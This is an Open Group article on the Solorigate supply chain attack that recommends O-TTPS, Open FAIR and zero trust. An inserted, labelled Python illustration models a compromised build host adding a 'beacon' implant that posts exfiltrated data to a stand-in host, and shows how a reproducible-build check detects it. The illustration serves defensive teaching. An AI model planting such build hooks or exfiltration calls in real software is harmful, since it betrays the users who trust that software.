Solorigate: A case study for why supply chain security is critical for governments and businesses

By Jim Hietala (VP, BD and Security), Andras Szakal (VP and CTO), John Linford (Security and OTTF Forum Director) – The Open Group

What happened?

In potentially the most damaging cyber-supply chain attack ever, a leading IT systems management vendor became the latest high-tech company to suffer a major cybersecurity breach with wide-reaching consequences. The malware at the centre of the attack has been dubbed Solorigate by Microsoft and code-named SUNBURST by FireEye, the security firm that uncovered the breach after falling victim to it late last year.

After infiltrating the development environment, the attackers were able to observe and learn how to subvert the vendor's development and operations pipeline. They then tainted the vendor's product by planting a sophisticated trojan in it. Once the software, which required broad systems access, was installed in customers' environments, the attackers were able to use the tainted software to exfiltrate sensitive information from within an organization's network.

Because the exfiltration used trusted channels, the attack went under the radar of most routine detection methods: Solorigate masqueraded as legitimate network traffic. The malicious actors also built detection evasion into the malware so that it could identify and avoid forensic and anti-virus tools on compromised networks. Routine product updates containing the tainted software were used to compromise thousands of customers, including major defense and government networks.
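To make the chain of trust concrete, here is an added illustration (not code from the article, from the vendor, or from any real pipeline) of why a trojan planted on a build server rides the vendor's normal release path unnoticed. It models a hypothetical source tree, a deterministic build, a build-host hook that injects an implant, and release signing; HMAC-SHA256 stands in for the vendor's code-signing key, and the argument is the same for a real signature. The customer's signature check passes because the vendor genuinely signed the tainted artifact. The one control in the model that catches it is an independent rebuild of the same source and a hash comparison (a reproducible-build check), which the article does not name but which falls under the build-integrity and configuration-management practices it recommends. All file names, paths and URLs are made up, and the builder is assumed to be deterministic.

```python
"""Model of the build-time taint and trusted-update path (constructed illustration)."""
import hashlib
import hmac
import secrets

# Hypothetical vendor source tree: path -> contents (constructed sample input).
SOURCE = {
    "src/agent.py": b"def collect(): return read_inventory()\n",
    "src/net.py": b"def send(report): post('https://updates.example/api', report)\n",
}

# Hypothetical implant the attacker plants on the compromised build host.
# It never touches the source repository, so source review cannot see it.
IMPLANT = b"def _beacon(): post('https://updates.example/api', exfil())\n"


def build(source: dict, build_host_hook=None) -> bytes:
    """Deterministic stand-in 'compiler': concatenates files in sorted order.
    build_host_hook models code injected by a compromised build host."""
    artifact = b""
    for path in sorted(source):
        body = source[path]
        if build_host_hook is not None:
            body = build_host_hook(path, body)
        artifact += b"# " + path.encode() + b"\n" + body
    return artifact


def compromised_hook(path: str, body: bytes) -> bytes:
    # Append the implant only to the networking module, mirroring a build-time taint
    # that hides inside code which is expected to talk to the network anyway.
    return body + IMPLANT if path.endswith("net.py") else body


def sign(key: bytes, artifact: bytes) -> bytes:
    """Stand-in for the vendor's code-signing key (assumption: HMAC-SHA256 here;
    a real asymmetric signature behaves identically for this argument)."""
    return hmac.new(key, artifact, hashlib.sha256).digest()


def verify_signature(key: bytes, artifact: bytes, sig: bytes) -> bool:
    """What an update client checks: that the vendor signed exactly these bytes."""
    return hmac.compare_digest(sign(key, artifact), sig)


def digest(artifact: bytes) -> str:
    return hashlib.sha256(artifact).hexdigest()


def reproducible_build_check(shipped: bytes, independent_rebuild: bytes) -> bool:
    """Auditor- or customer-side control: an artifact rebuilt from the same tagged
    source on an untainted builder must hash identically to what the vendor shipped."""
    return digest(shipped) == digest(independent_rebuild)


def scenario(vendor_key: bytes) -> dict:
    """Run the whole story and report what each control sees."""
    # The vendor's build farm is compromised; the release pipeline signs whatever it emits.
    shipped = build(SOURCE, compromised_hook)
    sig = sign(vendor_key, shipped)
    # Independent rebuild of the same source on a clean builder.
    clean = build(SOURCE)
    return {
        "signature_valid": verify_signature(vendor_key, shipped, sig),   # True: trust is inherited
        "implant_present": IMPLANT in shipped,                           # True: the taint shipped
        "rebuild_matches": reproducible_build_check(shipped, clean),      # False: only this control fires
    }


if __name__ == "__main__":
    print(scenario(secrets.token_bytes(32)))
```

The point the model makes is that every downstream check that keys off the vendor's signature (update clients, allow-listing, "is this binary from a trusted publisher") inherits the compromise, because the signing step sits after the tampering. Controls have to reach the build itself, which is why the engineering practices discussed later in this piece matter more than perimeter checks on the finished update.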

The security breach itself is not surprising. We have known for some time that highly capable, nation-state threat actors have been working on these sorts of supply chain attacks, targeting software firms that can provide large-scale impacts.

Forensic teams are currently evaluating how the attackers gained access to the vendor's development environment and subverted its nominal build, test, and deploy process to plant the tainted software in the product. Even so, it was immediately clear that the vendor was not employing supply chain risk management (SCRM) mitigation techniques that might have limited the damage.

Why does it matter?

In the realm of supply chain risk management, Solorigate represents a true worst-case scenario for vendors and their customers. A determined, highly capable threat actor compromised the software of a very widely used product and used standard update mechanisms to deploy malware onto potentially thousands of customers. Because the attackers could then move laterally through customers' networks largely unimpeded, the blast radius extended to entire companies and government organizations in near record time.

Media reports indicate that among those organizations known to be affected are several US Government Departments (Treasury, Commerce, and Homeland Security) as well as FireEye, the security firm that discovered the compromise.

What's more, CISOs and security staff have been dramatically affected. Organizations have been in "drop everything" mode to implement detection mechanisms and mitigations across their networks. This is likely to continue for some time as teams work to remove the malware from every infected system and assess the true damage.

What can technology providers of ICT do to prevent similar supply chain breaches?

Technology providers can benefit from existing industry best practice. ISO/IEC 20243 (also known as the Open Trusted Technology Provider™ Standard, or O-TTPS) was developed by ICT providers in partnership with government to address exactly these kinds of taint and counterfeit threats against ICT supply chains. Had the vendor adopted and followed this standard in advance, it would have been a powerful tool in helping to prevent Solorigate.

ISO/IEC 20243, developed by the Open Trusted Technology Forum (a Forum of The Open Group), was originally driven by the US DoD as part of the Comprehensive National Cybersecurity Initiative (CNCI). CNCI anticipated supply chain attacks such as Solorigate and worked to prepare the ICT community and COTS (commercial off-the-shelf) vendors against them. The standard addresses supply chain threats that manifest upstream at the technology provider and spread downstream through IT supply chains. A certification program accompanies the standard, with both self-assessment and third-party assessment tracks.

The O-TTPS is a two-part standard: Part 1 contains the requirements and recommendations, while Part 2 contains the assessment procedures. Both are freely available from The Open Group after creating a free login, and are also available from ISO as ISO/IEC 20243, Parts 1 and 2.

The O-TTPS provides a set of best practices in two general areas: engineering practices and supply chain management.

Many requirements in the engineering practices area of the O-TTPS could have helped limit the attacker's ability to compromise the vendor's software. These include: software/firmware/hardware design; configuration management; development/engineering method, process, and practices; quality and test management; secure development/engineering management; threat analysis and mitigation; and vulnerability analysis and response.

In the supply chain management area of the O-TTPS, requirements that could have been useful to the affected vendor include: risk management; employee and supplier security and integrity; business partner security; supply chain security training; information systems security; trusted technology components; secure transmission; open source handling; counterfeit mitigation; and malware detection.

It is worth noting that in today’s interconnected world where global supply chains are the status quo, technology suppliers who are intent on taking supply chain risk management seriously will need to encourage their upstream suppliers and downstream business partners to adopt and follow the O-TTPS as well.

Beyond adoption of the O-TTPS as a best-practice standard, two further areas affect security for technology providers, and standards likewise provide useful guidance for each. The first is risk measurement and management. The old saying "you can't manage what you can't measure" is key to investing in risk mitigations. Vendor organizations often struggle to measure and manage risk effectively, whether internal, external, or supply chain risk. The Open Group Open FAIR standards can help here by providing the means to quantify risk, enabling more effective management of it.

The second area is a zero trust approach to security. This involves an emerging security architecture design known as Zero Trust Security Architecture (ZTA), in which designers of security architecture, whether for customer or vendor organizations, assume no implicit trust on internal networks. This can limit an attacker's ability to move between and compromise systems within a network. The Open Group is working to standardize ZTA patterns and nomenclature, and also plans to begin an open source ZTA project in 2021.

What can others in the ICT supply chain do to ensure the security of their offerings, whether they are upstream or downstream of technology providers?

For suppliers upstream of technology providers, including suppliers of code and hardware components, adopting the O-TTPS to guide secure development and supply chain management is highly recommended.

Likewise, for business partners downstream of technology providers, including resellers, system integrators, and others in the fulfillment area, adoption of the O-TTPS in conjunction with a third-party assessment is highly recommended. Increasingly, both technology providers and customer organizations will require this approach.

What can consumers of ICT do to ensure security of their supply chains?

Customer organizations, including commercial and government organizations that consume COTS hardware and software solutions, have the greatest role to play in guarding supply chains against taint and counterfeit threats.

By adopting a globally recognized best-practice framework like ISO/IEC 20243/O-TTPS and adding a certification requirement to ICT procurements, as well as to laws and regulations (for governments), customer organizations can help the industry improve the security of COTS products. This benefits not just their own organization, but the security posture of the industry at large.

Customer organizations can also adopt the risk measurement standards and zero trust security architecture thinking described above. These will enable them to measure and manage risk more effectively and to architect security that better counters the very real supply chain threats we face today.

www.opengroup.org @theopengroup

Authors:

Jim Hietala, VP, BD & Security, The Open Group

Andras Szakal, VP & CTO, The Open Group

John Linford, Forum Director, Security and Open Trusted Technology Forum, The Open Group